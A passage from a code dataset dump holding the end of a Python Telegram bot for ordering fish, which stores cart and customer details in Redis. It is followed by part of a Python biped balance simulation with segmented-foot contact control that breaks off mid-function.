update.callback_query.message.chat_id\n delete_message(bot, update)\n\n bot.send_message(\n chat_id=chat_id,\n text='Please choose fish:',\n reply_markup=create_keyboard_for_menu()\n )\n return \"HANDLE_MENU\"\n\n\ndef handle_menu(bot, update):\n if update.callback_query.data == 'cart':\n return handle_description(bot, update)\n\n product_id = update.callback_query.data\n product = get_product(product_id)\n product_info = get_product_info(product)\n product_image_url = get_product_image_url(\n product['relationships']['main_image']['data']['id']\n )\n delete_message(bot, update)\n bot.send_photo(\n chat_id=update.callback_query.message.chat_id,\n photo=product_image_url,\n caption=product_info,\n reply_markup=create_keyboard_for_product_description(product),\n )\n return 'HANDLE_DESCRIPTION'\n\n\ndef handle_description(bot, update):\n if update.callback_query.data == 'back':\n return start(bot, update)\n\n 
elif update.callback_query.data == 'cart' or\\\n update.callback_query.data == 'update_cart':\n delete_message(bot, update)\n user_id = update.callback_query.message.chat_id\n user_cart_items = get_user_cart_items(user_id)\n user_cart = get_user_cart(user_id)\n bot.send_message(\n chat_id=user_id,\n text=get_user_cart_info(user_cart_items, user_cart),\n reply_markup=create_keyboard_for_cart(user_cart_items)\n )\n return 'HANDLE_CART'\n\n product_id, quantity_of_product = update.callback_query.data.split(',')\n add_product_to_cart(\n product_id,\n int(quantity_of_product),\n update.callback_query.message.chat_id\n )\n return 'HANDLE_DESCRIPTION'\n\n\ndef handle_cart(bot, update):\n if update.callback_query.data == 'menu':\n return start(bot, update)\n elif update.callback_query.data == 'buy':\n bot.send_message(\n chat_id=update.callback_query.message.chat_id,\n text='What is your name?'\n )\n return 'WAITING_CUSTOMER_NAME'\n\n delete_product_from_cart(\n update.callback_query.message.chat_id,\n update.callback_query.data\n )\n update.callback_query.data = 'update_cart'\n return handle_description(bot, update)\n\n\ndef handle_waiting_customer_name(bot, update):\n if update.message:\n customer_name = update.message.text\n database.set(f'customer_{update.message.chat_id}:name', customer_name)\n update.message.reply_text('Please give me your email.')\n else:\n bot.send_message(\n chat_id=update.callback_query.message.chat_id,\n text='Please give me your email.'\n )\n return 'WAITING_EMAIL'\n\n\ndef handle_email(bot, update):\n email = update.message.text\n if not is_email_valid(email):\n update.message.reply_text(\n f'You sent the wrong email: {email}\\nPlease try again'\n )\n return 'HANDLE_EMAIL'\n database.set(f'customer_{update.message.chat_id}:email', email)\n update.message.reply_text(text='Please give me your phone number.')\n return 'WAITING_PHONE_NUMBER'\n\n\ndef handle_waiting_phone_number(bot, update):\n phone_number = update.message.text\n if not is_phone_number_valid(phone_number):\n update.message.reply_text(\n text=f'You sent the wrong phone number: {phone_number}.\\n' +\n 'Your phone number should be like: +7 *** *** ** **\\n' +\n 'Please try again.'\n )\n return 'WAITING_PHONE_NUMBER'\n database.set(f'customer_{update.message.chat_id}:phone_number', phone_number)\n customer_email = database.get(\n f'customer_{update.message.chat_id}:email'\n ).decode('utf-8')\n bot.send_message(\n chat_id=update.message.chat_id,\n text=f'Are your data correct?\\n' +\n f'Your email: {customer_email}\\nYour phone number: {phone_number}',\n reply_markup=create_keyboard_for_confirm()\n )\n return 'HANDLE_CONFIRM_PERSONAL_DATA'\n\n\ndef handle_confirm_personal_data(bot, update):\n customer_name = database.get(\n f'customer_{update.callback_query.message.chat_id}:name'\n ).decode('utf-8')\n email = database.get(\n f'customer_{update.callback_query.message.chat_id}:email'\n ).decode('utf-8')\n if update.callback_query.data == 'yes':\n bot.send_message(\n chat_id=update.callback_query.message.chat_id,\n text='Thank you for the order!\\nWe will contact you shortly!',\n )\n create_customer(customer_name, email)\n return start(bot, update)\n else:\n bot.send_message(\n chat_id=update.callback_query.message.chat_id,\n text='Enter your data again.',\n )\n return handle_waiting_customer_name(bot, update)\n\n\ndef handle_users_reply(bot, update):\n database = get_database_connection()\n if update.message:\n user_reply = update.message.text\n chat_id = update.message.chat_id\n elif update.callback_query:\n 
user_reply = update.callback_query.data\n        chat_id = update.callback_query.message.chat_id\n    else:\n        return\n    if user_reply == '/start':\n        user_state = 'START'\n    else:\n        saved_state = database.get(chat_id)\n        # fall back to START for users the bot has never seen before\n        user_state = saved_state.decode('utf-8') if saved_state else 'START'\n\n    states_functions = {\n        'START': start,\n        'HANDLE_MENU': handle_menu,\n        'HANDLE_DESCRIPTION': handle_description,\n        'HANDLE_CART': handle_cart,\n        'WAITING_CUSTOMER_NAME': handle_waiting_customer_name,\n        'WAITING_EMAIL': handle_email,\n        'WAITING_PHONE_NUMBER': handle_waiting_phone_number,\n        'HANDLE_CONFIRM_PERSONAL_DATA': handle_confirm_personal_data\n    }\n    state_handler = states_functions[user_state]\n\n    try:\n        next_state = state_handler(bot, update)\n        database.set(chat_id, next_state)\n    except Exception as error:\n        logger.exception(error)\n\n\ndef get_database_connection():\n    global database\n    if database is None:\n        redis_password = os.getenv('REDIS_PASSWORD')\n        redis_host = os.getenv('REDIS_HOST')\n        redis_port = os.getenv('REDIS_PORT')\n        database = redis.Redis(\n            host=redis_host,\n            port=redis_port,\n            password=redis_password\n        )\n    return database\n\n\ndef run_bot():\n    load_dotenv()\n    logging.basicConfig(\n        level=logging.INFO,\n        format='%(levelname)s:%(name)s:%(message)s'\n    )\n    logger.addHandler(LogsHandler())\n    telegram_token = os.getenv('TELEGRAM_TOKEN')\n    updater = Updater(telegram_token)\n    dispatcher = updater.dispatcher\n    dispatcher.add_handler(CallbackQueryHandler(handle_users_reply))\n    dispatcher.add_handler(MessageHandler(Filters.text, handle_users_reply))\n    dispatcher.add_handler(CommandHandler('start', handle_users_reply))\n    updater.start_polling()\n    logger.info('The bot is running')\n\n\nif __name__ == '__main__':\n    run_bot()","sub_path":"telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":9798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"266108337","text":"from fltk import *\nimport copy\nimport numpy as np\nimport math\n\nimport sys\nif '../..' 
not in sys.path:\n sys.path.append('../..')\nfrom PyCommon.modules.Math import mmMath as mm\nfrom PyCommon.modules.Resource import ysMotionLoader as yf\nfrom PyCommon.modules.Renderer import ysRenderer as yr\nfrom PyCommon.modules.Simulator import csVpWorld as cvw\nfrom PyCommon.modules.Simulator import csVpModel as cvm\n# from PyCommon.modules.GUI import ysSimpleViewer as ysv\nfrom PyCommon.modules.GUI import hpSimpleViewer as hsv\nfrom PyCommon.modules.Optimization import ysAnalyticConstrainedOpt as yac\nfrom PyCommon.modules.Util import ysPythonEx as ype\nfrom PyCommon.modules.ArticulatedBody import ysReferencePoints as yrp\nfrom PyCommon.modules.ArticulatedBody import ysMomentum as ymt\nfrom PyCommon.modules.ArticulatedBody import ysControl as yct\nfrom PyCommon.modules.ArticulatedBody import hpInvKineDart as hik\n\nfrom MomentumProject.foot_example_segfoot_constraint import mtOptimize as mot\nfrom MomentumProject.foot_example_segfoot_constraint import mtInitialize as mit\nfrom MomentumProject.foot_example_segfoot_constraint.foot_window import FootWindow\n\nfrom PyCommon.modules.ArticulatedBody import hpFootIK as hfi\n# from scipy.spatial import Delaunay\n\n# import pydart2 as pydart\n# from PyCommon.modules.Simulator import csDartModel as cdm\n# from OpenGL.GL import *\n# from OpenGL.GLUT import *\n\n\ng_initFlag = 0\nforceShowTime = 0\n\nJsysPre = 0\nJsupPreL = 0\nJsupPreR = 0\nJconstPre = 0\n\ncontactChangeCount = 0\ncontactChangeType = 0\ncontact = 0\nmaxContactChangeCount = 30\n\npreFootCenter = [None]\n\nDART_CONTACT_ON = False\nSKELETON_ON = True\n\n\ndef main():\n # np.set_printoptions(precision=4, linewidth=200)\n np.set_printoptions(precision=5, threshold=np.inf, suppress=True, linewidth=3000)\n\n motionFile = 'wd2_tiptoe.bvh'\n motionFile = 'wd2_tiptoe_zygote.bvh'\n # motion, mcfg, wcfg, stepsPerFrame, config, frame_rate = mit.create_biped(motionFile, SEGMENT_FOOT_RAD=0.008)\n motion, mcfg, wcfg, stepsPerFrame, config, frame_rate = mit.create_biped(motionFile, SEGMENT_FOOT_MAG=0.01, SEGMENT_FOOT_RAD=0.008)\n # motion, mcfg, wcfg, stepsPerFrame, config, frame_rate = mit.create_biped()\n # motion, mcfg, wcfg, stepsPerFrame, config = mit.create_jump_biped()\n\n vpWorld = cvw.VpWorld(wcfg)\n vpWorld.SetGlobalDamping(0.999)\n motionModel = cvm.VpMotionModel(vpWorld, motion[0], mcfg)\n controlModel = cvm.VpControlModel(vpWorld, motion[0], mcfg)\n # controlModel_shadow_for_ik = cvm.VpControlModel(vpWorld, motion[0], mcfg)\n vpWorld.initialize()\n controlModel.initializeHybridDynamics()\n\n # controlToMotionOffset = (1.5, -0.02, 0)\n controlToMotionOffset = (1.5, 0., 0)\n controlModel.translateByOffset(controlToMotionOffset)\n # controlModel_shadow_for_ik.set_q(controlModel.get_q())\n # controlModel_shadow_for_ik.computeJacobian(0, np.array([0., 0., 0.]))\n\n wcfg_ik = copy.deepcopy(wcfg)\n vpWorld_ik = cvw.VpWorld(wcfg_ik)\n controlModel_ik = cvm.VpControlModel(vpWorld_ik, motion[0], mcfg)\n vpWorld_ik.initialize()\n controlModel_ik.set_q(np.zeros_like(controlModel.get_q()))\n\n\n\n totalDOF = controlModel.getTotalDOF()\n DOFs = controlModel.getDOFs()\n\n foot_dofs = []\n left_foot_dofs = []\n right_foot_dofs = []\n\n foot_seg_dofs = []\n left_foot_seg_dofs = []\n right_foot_seg_dofs = []\n\n # for joint_idx in range(motion[0].skeleton.getJointNum()):\n for joint_idx in range(controlModel.getJointNum()):\n joint_name = controlModel.index2name(joint_idx)\n # joint_name = motion[0].skeleton.getJointName(joint_idx)\n if 'Foot' in joint_name:\n foot_dofs_temp = 
controlModel.getJointDOFIndexes(joint_idx)\n foot_dofs.extend(foot_dofs_temp)\n if 'Left' in joint_name:\n left_foot_dofs.extend(foot_dofs_temp)\n elif 'Right' in joint_name:\n right_foot_dofs.extend(foot_dofs_temp)\n\n if 'foot' in joint_name:\n foot_dofs_temp = controlModel.getJointDOFIndexes(joint_idx)\n foot_seg_dofs.extend(foot_dofs_temp)\n if 'Left' in joint_name:\n left_foot_seg_dofs.extend(foot_dofs_temp)\n elif 'Right' in joint_name:\n right_foot_seg_dofs.extend(foot_dofs_temp)\n\n # parameter\n Kt = config['Kt']; Dt = config['Dt'] # tracking gain\n Kl = config['Kl']; Dl = config['Dl'] # linear balance gain\n Kh = config['Kh']; Dh = config['Dh'] # angular balance gain\n Ks = config['Ks']; Ds = config['Ds'] # penalty force spring gain\n\n Bt = config['Bt']\n Bl = config['Bl']\n Bh = config['Bh']\n\n selectedBody = motion[0].skeleton.getJointIndex(config['end'])\n constBody = motion[0].skeleton.getJointIndex('RightFoot')\n\n supL = motion[0].skeleton.getJointIndex('LeftFoot')\n supR = motion[0].skeleton.getJointIndex('RightFoot')\n\n # momentum matrix\n linkMasses = controlModel.getBodyMasses()\n totalMass = controlModel.getTotalMass()\n TO = ymt.make_TO(linkMasses)\n dTO = ymt.make_dTO(len(linkMasses))\n\n # optimization\n problem = yac.LSE(totalDOF, 12)\n # a_sup = (0,0,0, 0,0,0) #ori\n # a_sup = (0,0,0, 0,0,0) #L\n CP_old = [mm.v3(0., 0., 0.)]\n\n # penalty method\n bodyIDsToCheck = list(range(vpWorld.getBodyNum()))\n # mus = [1.]*len(bodyIDsToCheck)\n mus = [.5]*len(bodyIDsToCheck)\n\n # flat data structure\n ddth_des_flat = ype.makeFlatList(totalDOF)\n dth_flat = ype.makeFlatList(totalDOF)\n ddth_sol = ype.makeNestedList(DOFs)\n\n # viewer\n rd_footCenter = [None]\n rd_footCenter_ref = [None]\n rd_footCenterL = [None]\n rd_footCenterR = [None]\n rd_CM_plane = [None]\n rd_CM = [None]\n rd_CP = [None]\n rd_CP_des = [None]\n rd_dL_des_plane = [None]\n rd_dH_des = [None]\n rd_grf_des = [None]\n\n rd_exf_des = [None]\n rd_exfen_des = [None]\n rd_root_des = [None]\n\n rd_foot_ori = [None]\n rd_foot_pos = [None]\n\n rd_root_ori = [None]\n rd_root_pos = [None]\n\n rd_CF = [None]\n rd_CF_pos = [None]\n\n rootPos = [None]\n selectedBodyId = [selectedBody]\n extraForce = [None]\n extraForcePos = [None]\n\n rightFootVectorX = [None]\n rightFootVectorY = [None]\n rightFootVectorZ = [None]\n rightFootPos = [None]\n\n rightVectorX = [None]\n rightVectorY = [None]\n rightVectorZ = [None]\n rightPos = [None]\n\n def makeEmptyBasicSkeletonTransformDict(init=None):\n Ts = dict()\n Ts['pelvis'] = init\n Ts['spine_ribs'] = init\n Ts['head'] = init\n Ts['thigh_R'] = init\n Ts['shin_R'] = init\n Ts['foot_heel_R'] = init\n Ts['foot_R'] = init\n Ts['heel_R'] = init\n Ts['outside_metatarsal_R'] = init\n Ts['outside_phalanges_R'] = init\n Ts['inside_metatarsal_R'] = init\n Ts['inside_phalanges_R'] = init\n Ts['upper_limb_R'] = init\n Ts['lower_limb_R'] = init\n Ts['thigh_L'] = init\n Ts['shin_L'] = init\n Ts['foot_heel_L'] = init\n Ts['foot_L'] = init\n Ts['heel_L'] = init\n Ts['outside_metatarsal_L'] = init\n Ts['outside_phalanges_L'] = init\n Ts['inside_metatarsal_L'] = init\n Ts['inside_phalanges_L'] = init\n\n Ts['upper_limb_L'] = init\n Ts['lower_limb_L'] = init\n\n return Ts\n\n # viewer = ysv.SimpleViewer()\n # viewer = hsv.hpSimpleViewer(rect=[0, 0, 1024, 768], viewForceWnd=False)\n viewer = hsv.hpSimpleViewer(rect=[0, 0, 960+300, 1+1080+55], viewForceWnd=False)\n # viewer.record(False)\n # viewer.doc.addRenderer('motion', yr.JointMotionRenderer(motion, (0,255,255), yr.LINK_BONE))\n 
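# attach the motion and the model renderers to the viewer document; most of\n    # the debug renderers registered below start hidden and can be toggled later\n    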
viewer.doc.addObject('motion', motion)\n viewer.doc.addRenderer('motionModel', yr.VpModelRenderer(motionModel, (150,150,255), yr.POLYGON_FILL))\n viewer.doc.setRendererVisible('motionModel', False)\n viewer.doc.addRenderer('ikModel', yr.VpModelRenderer(controlModel_ik, (150,150,255), yr.POLYGON_LINE))\n viewer.doc.setRendererVisible('ikModel', False)\n # viewer.doc.addRenderer('controlModel', cvr.VpModelRenderer(controlModel, (255,240,255), yr.POLYGON_LINE))\n control_model_renderer = yr.VpModelRenderer(controlModel, (255,240,255), yr.POLYGON_FILL)\n viewer.doc.addRenderer('controlModel', control_model_renderer)\n skeleton_renderer = None\n if SKELETON_ON:\n # skeleton_renderer = yr.BasicSkeletonRenderer(makeEmptyBasicSkeletonTransformDict(np.eye(4)), offset_Y=-0.08)\n # skeleton_renderer = yr.BasicSkeletonRenderer(makeEmptyBasicSkeletonTransformDict(np.eye(4)), color=(230, 230, 230), offset_draw=(0.8, -0.02, 0.))\n skeleton_renderer = yr.BasicSkeletonRenderer(makeEmptyBasicSkeletonTransformDict(np.eye(4)), color=(230, 230, 230), offset_draw=(0., -0.0, 0.))\n viewer.doc.addRenderer('skeleton', skeleton_renderer)\n viewer.doc.addRenderer('rd_footCenter', yr.PointsRenderer(rd_footCenter))\n viewer.doc.setRendererVisible('rd_footCenter', False)\n viewer.doc.addRenderer('rd_footCenter_ref', yr.PointsRenderer(rd_footCenter_ref))\n viewer.doc.setRendererVisible('rd_footCenter_ref', False)\n viewer.doc.addRenderer('rd_CM_plane', yr.PointsRenderer(rd_CM_plane, (255,255,0)))\n viewer.doc.setRendererVisible('rd_CM_plane', False)\n viewer.doc.addRenderer('rd_CP', yr.PointsRenderer(rd_CP, (0,255,0)))\n viewer.doc.setRendererVisible('rd_CP', False)\n viewer.doc.addRenderer('rd_CP_des', yr.PointsRenderer(rd_CP_des, (255,0,255)))\n viewer.doc.setRendererVisible('rd_CP_des', False)\n viewer.doc.addRenderer('rd_dL_des_plane', yr.VectorsRenderer(rd_dL_des_plane, rd_CM, (255,255,0)))\n viewer.doc.setRendererVisible('rd_dL_des_plane', False)\n viewer.doc.addRenderer('rd_dH_des', yr.VectorsRenderer(rd_dH_des, rd_CM, (0,255,0)))\n viewer.doc.setRendererVisible('rd_dH_des', False)\n # viewer.doc.addRenderer('rd_grf_des', yr.ForcesRenderer(rd_grf_des, rd_CP_des, (0,255,0), .001))\n viewer.doc.addRenderer('rd_CF', yr.VectorsRenderer(rd_CF, rd_CF_pos, (255,255,0)))\n viewer.doc.setRendererVisible('rd_CF', False)\n viewer.doc.addRenderer('rd_foot_ori', yr.OrientationsRenderer(rd_foot_ori, rd_foot_pos, (255,255,0)))\n viewer.doc.setRendererVisible('rd_foot_ori', False)\n\n viewer.doc.addRenderer('rd_root_ori', yr.OrientationsRenderer(rd_root_ori, rd_root_pos, (255,255,0)))\n viewer.doc.setRendererVisible('rd_root_ori', False)\n\n viewer.doc.addRenderer('extraForce', yr.VectorsRenderer(rd_exf_des, extraForcePos, (0,255,0)))\n viewer.doc.setRendererVisible('extraForce', False)\n viewer.doc.addRenderer('extraForceEnable', yr.VectorsRenderer(rd_exfen_des, extraForcePos, (255,0,0)))\n\n # viewer.doc.addRenderer('right_foot_oriX', yr.VectorsRenderer(rightFootVectorX, rightFootPos, (255,0,0)))\n # viewer.doc.addRenderer('right_foot_oriY', yr.VectorsRenderer(rightFootVectorY, rightFootPos, (0,255,0)))\n # viewer.doc.addRenderer('right_foot_oriZ', yr.VectorsRenderer(rightFootVectorZ, rightFootPos, (0,0,255)))\n\n # viewer.doc.addRenderer('right_oriX', yr.VectorsRenderer(rightVectorX, rightPos, (255,0,0)))\n # viewer.doc.addRenderer('right_oriY', yr.VectorsRenderer(rightVectorY, rightPos, (0,255,0)))\n # viewer.doc.addRenderer('right_oriZ', yr.VectorsRenderer(rightVectorZ, rightPos, (0,0,255)))\n\n # foot_viewer = 
FootWindow(viewer.x() + viewer.w() + 20, viewer.y(), 300, 400, 'foot contact modifier', controlModel)\n foot_viewer = None # type: FootWindow\n\n initKt = 25.\n # initKt = 60.\n initKl = 100.\n initKh = 100.\n\n initBl = .1\n initBh = .13\n # initSupKt = 17\n initSupKt = 22\n\n initFm = 50.0\n\n initComX = 0.\n initComY = 0.\n initComZ = 0.\n\n viewer.objectInfoWnd.add1DSlider(\"Kt\", 0., 300., 1., initKt)\n viewer.objectInfoWnd.add1DSlider(\"Kl\", 0., 300., 1., initKl)\n viewer.objectInfoWnd.add1DSlider(\"Kh\", 0., 300., 1., initKh)\n viewer.objectInfoWnd.add1DSlider(\"Bl\", 0., 1., .001, initBl)\n viewer.objectInfoWnd.add1DSlider(\"Bh\", 0., 1., .001, initBh)\n viewer.objectInfoWnd.add1DSlider(\"SupKt\", 0., 300., 0.1, initSupKt)\n viewer.objectInfoWnd.add1DSlider(\"Fm\", 0., 1000., 10., initFm)\n viewer.objectInfoWnd.add1DSlider(\"com X offset\", -1., 1., 0.01, initComX)\n viewer.objectInfoWnd.add1DSlider(\"com Y offset\", -1., 1., 0.01, initComY)\n viewer.objectInfoWnd.add1DSlider(\"com Z offset\", -1., 1., 0.01, initComZ)\n viewer.objectInfoWnd.add1DSlider(\"tiptoe angle\", -0.5, .5, 0.001, 0.)\n viewer.objectInfoWnd.add1DSlider(\"left tilt angle\", -0.5, .5, 0.001, 0.)\n viewer.objectInfoWnd.add1DSlider(\"right tilt angle\", -0.5, .5, 0.001, 0.)\n\n viewer.force_on = False\n\n def viewer_SetForceState(object):\n viewer.force_on = True\n\n def viewer_GetForceState():\n return viewer.force_on\n\n def viewer_ResetForceState():\n viewer.force_on = False\n\n viewer.objectInfoWnd.addBtn('Force on', viewer_SetForceState)\n viewer_ResetForceState()\n\n offset = 60\n\n viewer.objectInfoWnd.begin()\n viewer.objectInfoWnd.labelForceX = Fl_Value_Input(20, 30+offset*9, 40, 20, 'X')\n viewer.objectInfoWnd.labelForceX.value(0)\n\n viewer.objectInfoWnd.labelForceY = Fl_Value_Input(80, 30+offset*9, 40, 20, 'Y')\n viewer.objectInfoWnd.labelForceY.value(0)\n\n viewer.objectInfoWnd.labelForceZ = Fl_Value_Input(140, 30+offset*9, 40, 20, 'Z')\n viewer.objectInfoWnd.labelForceZ.value(1)\n\n viewer.objectInfoWnd.labelForceDur = Fl_Value_Input(220, 30+offset*9, 40, 20, 'Dur')\n viewer.objectInfoWnd.labelForceDur.value(0.1)\n\n viewer.objectInfoWnd.end()\n\n # self.sliderFm = Fl_Hor_Nice_Slider(10, 42+offset*6, 250, 10)\n\n def getParamVal(paramname):\n return viewer.objectInfoWnd.getVal(paramname)\n\n def getParamVals(paramnames):\n return (getParamVal(name) for name in paramnames)\n\n def setParamVal(paramname, val):\n viewer.objectInfoWnd.setVal(paramname, val)\n\n idDic = dict()\n for i in range(motion[0].skeleton.getJointNum()):\n idDic[motion[0].skeleton.getJointName(i)] = i\n\n # extendedFootName = ['Foot_foot_0_0', 'Foot_foot_0_1', 'Foot_foot_0_0_0', 'Foot_foot_0_1_0', 'Foot_foot_1_0']\n extendedFootName = ['Foot_foot_0_0', 'Foot_foot_0_0_0', 'Foot_foot_0_1_0', 'Foot_foot_1_0']\n lIDdic = {'Left'+name: motion[0].skeleton.getJointIndex('Left'+name) for name in extendedFootName}\n rIDdic = {'Right'+name: motion[0].skeleton.getJointIndex('Right'+name) for name in extendedFootName}\n footIdDic = lIDdic.copy()\n footIdDic.update(rIDdic)\n\n lIDlist = [motion[0].skeleton.getJointIndex('Left'+name) for name in extendedFootName]\n rIDlist = [motion[0].skeleton.getJointIndex('Right'+name) for name in extendedFootName]\n footIdlist = []\n footIdlist.extend(lIDlist)\n footIdlist.extend(rIDlist)\n\n foot_left_idx = motion[0].skeleton.getJointIndex('LeftFoot')\n foot_right_idx = motion[0].skeleton.getJointIndex('RightFoot')\n\n foot_left_idx_temp = motion[0].skeleton.getJointIndex('LeftFoot_foot_1_0')\n 
foot_right_idx_temp = motion[0].skeleton.getJointIndex('RightFoot_foot_1_0')\n\n # ik_solver = hik.numIkSolver(dartIkModel)\n # ik_solver.clear()\n\n # bodyIDsToCheck = rIDlist.copy()\n\n joint_names = [motion[0].skeleton.getJointName(i) for i in range(motion[0].skeleton.getJointNum())]\n\n def fix_dofs(_DOFs, nested_dof_values, _mcfg, _joint_names):\n fixed_nested_dof_values = list()\n fixed_nested_dof_values.append(nested_dof_values[0])\n for i in range(1, len(_DOFs)):\n dof = _DOFs[i]\n if dof == 1:\n node = _mcfg.getNode(_joint_names[i])\n axis = mm.unitZ()\n if node.jointAxes[0] == 'X':\n axis = mm.unitX()\n elif node.jointAxes[0] == 'Y':\n axis = mm.unitY()\n fixed_nested_dof_values.append(np.array([np.dot(nested_dof_values[i], axis)]))\n else:\n fixed_nested_dof_values.append(nested_dof_values[i])\n\n return fixed_nested_dof_values\n\n start_frame = 100\n\n up_vec_in_each_link = dict()\n for foot_id in footIdlist:\n up_vec_in_each_link[foot_id] = controlModel_ik.getBodyOrientationGlobal(foot_id)[1, :]\n controlModel_ik.set_q(controlModel.get_q())\n\n ###################################\n # simulate\n ###################################\n def simulateCallback(frame):\n # print(frame)\n # print(motion[frame].getJointOrientationLocal(footIdDic['RightFoot_foot_0_1_0']))\n if True:\n if frame == 200:\n if motionFile == 'wd2_tiptoe.bvh':\n setParamVal('tiptoe angle', 0.3)\n if motionFile == 'wd2_tiptoe_zygote.bvh':\n setParamVal('tiptoe angle', 0.3)\n # elif 210 < frame < 240:\n # if motionFile == 'wd2_tiptoe_zygote.bvh':\n # setParamVal('com Y offset', 0.01/30. * (frame-110))\n elif frame == 400:\n setParamVal('com Y offset', 0.)\n setParamVal('tiptoe angle', 0.)\n elif frame == 430:\n foot_viewer.check_all_seg()\n # setParamVal('SupKt', 30.)\n # elif frame == 400:\n # setParamVal('SupKt', 17.)\n\n\n # hfi.footAdjust(motion[frame], idDic, SEGMENT_FOOT_MAG=.03, SEGMENT_FOOT_RAD=.015, baseHeight=0.02)\n\n if abs(getParamVal('tiptoe angle')) > 0.001:\n tiptoe_angle = getParamVal('tiptoe angle')\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot_foot_0_0_0'],\n mm.exp(mm.unitX(), -math.pi * tiptoe_angle))\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot_foot_0_1_0'],\n mm.exp(mm.unitX(), -math.pi * tiptoe_angle))\n motion[frame].mulJointOrientationLocal(idDic['RightFoot_foot_0_0_0'],\n mm.exp(mm.unitX(), -math.pi * tiptoe_angle))\n motion[frame].mulJointOrientationLocal(idDic['RightFoot_foot_0_1_0'],\n mm.exp(mm.unitX(), -math.pi * tiptoe_angle))\n # motion[frame].mulJointOrientationLocal(idDic['LeftFoot'], mm.exp(mm.unitX(), math.pi * tiptoe_angle * 0.95))\n # motion[frame].mulJointOrientationLocal(idDic['RightFoot'], mm.exp(mm.unitX(), math.pi * tiptoe_angle * 0.95))\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot'], mm.exp(mm.unitX(), math.pi * tiptoe_angle))\n motion[frame].mulJointOrientationLocal(idDic['RightFoot'], mm.exp(mm.unitX(), math.pi * tiptoe_angle))\n\n if getParamVal('left tilt angle') > 0.001:\n left_tilt_angle = getParamVal('left tilt angle')\n if motion[0].skeleton.getJointIndex('LeftFoot_foot_0_1') is not None:\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot_foot_0_1'], mm.exp(mm.unitZ(), -math.pi * left_tilt_angle))\n else:\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot_foot_0_1_0'], mm.exp(mm.unitZ(), -math.pi * left_tilt_angle))\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot'], mm.exp(mm.unitZ(), math.pi * left_tilt_angle))\n\n elif getParamVal('left tilt angle') < -0.001:\n left_tilt_angle = getParamVal('left tilt 
angle')\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot_foot_0_0'], mm.exp(mm.unitZ(), -math.pi * left_tilt_angle))\n if motion[0].skeleton.getJointIndex('LeftFoot_foot_0_1') is not None:\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot_foot_0_1'], mm.exp(mm.unitZ(), math.pi * left_tilt_angle))\n else:\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot_foot_0_1_0'], mm.exp(mm.unitZ(), math.pi * left_tilt_angle))\n motion[frame].mulJointOrientationLocal(idDic['LeftFoot'], mm.exp(mm.unitZ(), math.pi * left_tilt_angle))\n\n if getParamVal('right tilt angle') > 0.001:\n right_tilt_angle = getParamVal('right tilt angle')\n if motion[0].skeleton.getJointIndex('RightFoot_foot_0_1') is not None:\n motion[frame].mulJointOrientationLocal(idDic['RightFoot_foot_0_1'], mm.exp(mm.unitZ(), math.pi * right_tilt_angle))\n else:\n motion[frame].mulJointOrientationLocal(idDic['RightFoot_foot_0_1_0'], mm.exp(mm.unitZ(), math.pi * right_tilt_angle))\n motion[frame].mulJointOrientationLocal(idDic['RightFoot'], mm.exp(mm.unitZ(), -math.pi * right_tilt_angle))\n elif getParamVal('right tilt angle') < -0.001:\n right_tilt_angle = getParamVal('right tilt angle')\n motion[frame].mulJointOrientationLocal(idDic['RightFoot_foot_0_0'], mm.exp(mm.unitZ(), math.pi * right_tilt_angle))\n if motion[0].skeleton.getJointIndex('RightFoot_foot_0_1') is not None:\n motion[frame].mulJointOrientationLocal(idDic['RightFoot_foot_0_1'], mm.exp(mm.unitZ(), -math.pi * right_tilt_angle))\n # else:\n # motion[frame].mulJointOrientationLocal(idDic['RightFoot_foot_0_1_0'], mm.exp(mm.unitZ(), -math.pi * right_tilt_angle))\n motion[frame].mulJointOrientationLocal(idDic['RightFoot'], mm.exp(mm.unitZ(), -math.pi * right_tilt_angle))\n\n motionModel.update(motion[frame])\n motionModel.translateByOffset(np.array([getParamVal('com X offset'), getParamVal('com Y offset'), getParamVal('com Z offset')]))\n controlModel_ik.set_q(controlModel.get_q())\n\n global g_initFlag\n global forceShowTime\n\n global JsysPre\n global JsupPreL\n global JsupPreR\n\n global JconstPre\n\n global preFootCenter\n global maxContactChangeCount\n global contactChangeCount\n global contact\n global contactChangeType\n\n Kt, Kl, Kh, Bl, Bh, kt_sup = getParamVals(['Kt', 'Kl', 'Kh', 'Bl', 'Bh', 'SupKt'])\n Dt = 2*(Kt**.5)\n Dl = 2*(Kl**.5)\n Dh = 2*(Kh**.5)\n dt_sup = 2*(kt_sup**.5)\n\n # tracking\n th_r = motion.getDOFPositions(frame)\n th = controlModel.getDOFPositions()\n dth_r = motion.getDOFVelocities(frame)\n dth = controlModel.getDOFVelocities()\n ddth_r = motion.getDOFAccelerations(frame)\n ddth_des = yct.getDesiredDOFAccelerations(th_r, th, dth_r, dth, ddth_r, Kt, Dt)\n\n # ype.flatten(fix_dofs(DOFs, ddth_des, mcfg, joint_names), ddth_des_flat)\n # ype.flatten(fix_dofs(DOFs, dth, mcfg, joint_names), dth_flat)\n ype.flatten(ddth_des, ddth_des_flat)\n ype.flatten(dth, dth_flat)\n\n #################################################\n # jacobian\n #################################################\n\n contact_des_ids = list() # desired contact segments\n if foot_viewer.check_om_l.value():\n contact_des_ids.append(motion[0].skeleton.getJointIndex('LeftFoot_foot_0_0'))\n if foot_viewer.check_op_l.value():\n contact_des_ids.append(motion[0].skeleton.getJointIndex('LeftFoot_foot_0_0_0'))\n if foot_viewer.check_im_l is not None and foot_viewer.check_im_l.value():\n contact_des_ids.append(motion[0].skeleton.getJointIndex('LeftFoot_foot_0_1'))\n if foot_viewer.check_ip_l.value():\n 
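# inside phalanges segment of the left foot\n            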
